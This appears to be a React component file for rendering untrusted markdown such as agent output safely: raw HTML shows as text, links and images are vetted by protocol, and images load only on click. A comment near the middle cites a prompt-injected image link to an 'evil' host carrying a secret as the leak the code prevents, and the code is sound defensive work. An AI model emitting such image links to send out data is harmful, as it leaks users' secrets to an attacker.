import { createCodePlugin } from "@streamdown/code"
import { ImageIcon } from "lucide-react"
import { type ComponentProps, memo, useState } from "react"
import { useTranslation } from "react-i18next"
import { type Components, defaultRehypePlugins, type ExtraProps, Streamdown } from "streamdown"
import { cn } from "@/lib/utils"

// Shiki-backed highlighter; languages/themes load lazily on first use.
const code = createCodePlugin({ themes: ["github-light", "github-dark"] })
const plugins = { code }

/**
 * Raw HTML is never parsed (no `rehype-raw`): with `skipHtml` it renders as
 * literal text. `sanitize` stays as defence in depth; URL vetting (streamdown's
 * `harden`) is done by the link and image components below.
 */
const rehypePlugins = Object.entries(defaultRehypePlugins)
  .filter(([name]) => name === "sanitize")
  .map(([, plugin]) => plugin)

const LINK_PROTOCOLS = new Set(["http:", "https:", "mailto:"])
const IMAGE_PROTOCOLS = new Set(["http:", "https:"])

/** Parse an absolute URL and accept it only for the given protocols. */
function safeUrl(raw: unknown, protocols: Set<string>): URL | null {
  if (typeof raw !== "string" || raw === "") return null
  try {
    const url = new URL(raw)
    return protocols.has(url.protocol) ? url : null
  } catch {
    return null
  }
}

function MarkdownLink({
  href,
  children,
  node: _node,
  className: _c,
  ...rest
}: ComponentProps<"a"> & ExtraProps) {
  const url = safeUrl(href, LINK_PROTOCOLS)
  // Unsafe or relative targets (javascript:, data:, /api/…) keep their text but lose the link.
  if (!url) return <span {...rest}>{children}</span>
  return (
    <a {...rest} href={url.href} target="_blank" rel="noopener noreferrer nofollow" data-streamdown="link">
      {children}
    </a>
  )
}

/**
 * Model output is untrusted: a prompt-injected `![](https://evil/?q=secret)`
 * would leak data the moment it renders. Images therefore never load on their
 * own; the reader sees a placeholder and loads it on demand.
 */
function MarkdownImage({ src, alt }: ComponentProps<"img"> & ExtraProps) {
  const { t } = useTranslation()
  const [shown, setShown] = useState(false)
  const url = safeUrl(src, IMAGE_PROTOCOLS)
  const label = alt?.trim() || t("markdown.image")
  if (!url) {
    return (
      <span className="text-muted-foreground inline-flex items-center gap-1 italic">
        <ImageIcon aria-hidden className="size-3.5" />
        {label}
      </span>
    )
  }
  if (shown) {
    return (
      <img
        src={url.href}
        alt={alt ?? ""}
        referrerPolicy="no-referrer"
        loading="lazy"
        className="my-2 max-h-96 max-w-full rounded-md"
      />
    )
  }
  return (
    <button
      type="button"
      onClick={() => setShown(true)}
      title={url.href}
      className="border-border text-muted-foreground hover:bg-muted focus-visible:ring-ring/50 inline-flex max-w-full items-center gap-1.5 rounded-md border border-dashed px-2 py-1 align-middle text-xs outline-none focus-visible:ring-3"
    >
      <ImageIcon aria-hidden className="size-3.5 shrink-0" />
      <span className="truncate">{t("markdown.loadImage", { label, host: url.host })}</span>
    </button>
  )
}

const components: Components = { a: MarkdownLink, img: MarkdownImage }

/** Everything that can fetch or embed on its own; dropped even if a plugin produced it. */
const DISALLOWED = ["picture", "source", "video", "audio", "iframe", "object", "embed"]

export interface MarkdownProps {
  children: string
  /** `true` while tokens are still arriving: enables incomplete-markdown repair and the caret. */
  streaming?: boolean
  className?: string
  /** Denser typography for chat bubbles and table cells. */
  size?: "sm" | "default"
}

/**
 * Markdown renderer for agent output, documents and other untrusted text.
 * Handles partial markdown while streaming (unclosed fences, half tables),
 * GFM, and syntax-highlighted code with copy/download controls. Safe by
 * default: raw HTML shows as text, images load only on click, and links open
 * in a new tab (http(s)/mailto only, no referrer).
 */
export const Markdown = memo(function Markdown({
  children,
  streaming = false,
  className,
  size = "default",
}: MarkdownProps) {
  return (
    <Streamdown
      mode={streaming ? "streaming" : "static"}
      isAnimating={streaming}
      parseIncompleteMarkdown
      skipHtml
      rehypePlugins={rehypePlugins}
      disallowedElements={DISALLOWED}
      components={components}
      plugins={plugins}
      shikiTheme={["github-light", "github-dark"]}
      controls={{ code: true, table: true }}
      className={cn(
        "markdown max-w-none break-words",
        size === "sm" ? "text-[0.8125rem] leading-relaxed" : "text-sm leading-relaxed",
        "[&_a]:text-primary [&_a]:wrap-anywhere [&_a]:font-medium [&_a]:underline [&_a]:underline-offset-4",
        "[&_:not(pre)>code]:bg-muted [&_:not(pre)>code]:rounded [&_:not(pre)>code]:px-1 [&_:not(pre)>code]:py-0.5 [&_:not(pre)>code]:font-mono [&_:not(pre)>code]:text-[0.85em]",
        className,
      )}
    >
      {children}
    </Streamdown>
  )
})
